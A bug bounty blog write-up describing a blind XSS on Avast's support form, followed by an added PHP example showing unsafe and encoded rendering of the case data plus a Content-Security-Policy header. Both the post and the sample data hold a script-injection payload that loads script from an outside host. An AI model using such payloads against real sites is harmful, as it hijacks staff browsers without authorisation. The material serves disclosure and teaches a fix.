My First Write-up: Blind XSS

dimasaprilian993
2 min read · Jun 8, 2020

Hi everybody, I hope you are all well. This is the first time I am writing up my bug bounty story. It started when I went to avast.com and searched for vulnerabilities there, but with no luck: I couldn't find anything. After several hours of searching, I found a place where we can submit a help request to the panel service.

The page looks like this:

It's my favorite kind of place to try to find blind XSS. I opened my XSS Hunter and inserted an XSS Hunter payload, '"><script src=https://dimasaprilian993.xss.ht></script>', in the "your first name" field.

After that I just submitted my request and hoped my payload would execute on the panel service. Okay, here I just waited, and after one day I got a notification from XSS Hunter to my email that my payload had executed on http://ccs.int.avast.com:8181/sf_case.php?

Oh yeah, this was my lucky day. After that I reported my finding to the security team: I sent them an email with a description of my finding.

TIMELINE

March 27: I sent an email to security.

April 6: they were working on fixing the bug.

April 29: bug fixed; they gave me a certificate and I requested disclosure.

Thanks.
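
The fix for this class of bug sits in the internal panel rather than the public form: every stored field has to be encoded when it is rendered for staff. The block below is an added example, not Avast's code and not part of the original post. It assumes a PHP case-view page; the function names, field names and the collector.example host are hypothetical.

```php
<?php
// Added example: rendering a user-submitted support case in an internal panel.
// All names here are hypothetical; the sample case is constructed.

// Constructed sample: the first-name field holds markup instead of a name.
$case = [
    'first_name' => '"><script src=https://collector.example></script>',
    'message'    => 'Please help with my licence.',
];

// Vulnerable pattern: the stored value is concatenated into HTML unchanged,
// so the markup runs in the browser of whoever opens the case.
function render_case_unsafe(array $case): string
{
    return '<td class="name">' . $case['first_name'] . '</td>';
}

// Hardened pattern: encode on output for the HTML context.
// ENT_QUOTES also encodes single quotes, which keeps attribute values safe;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_case_safe(array $case): string
{
    return '<td class="name">' . e($case['first_name']) . '</td>'
         . '<td class="message">' . e($case['message']) . '</td>';
}

// Defence in depth for the panel: even if one template misses an encode call,
// the browser refuses scripts loaded from any other origin.
function send_panel_headers(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; "
         . "object-src 'none'; base-uri 'none'");
    header('X-Content-Type-Options: nosniff');
}

if (PHP_SAPI === 'cli') {
    // Run from the command line to compare the two renderings.
    echo render_case_unsafe($case), PHP_EOL; // a raw <script> tag survives
    echo render_case_safe($case), PHP_EOL;   // inert text: &quot;&gt;&lt;script ...
}
```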
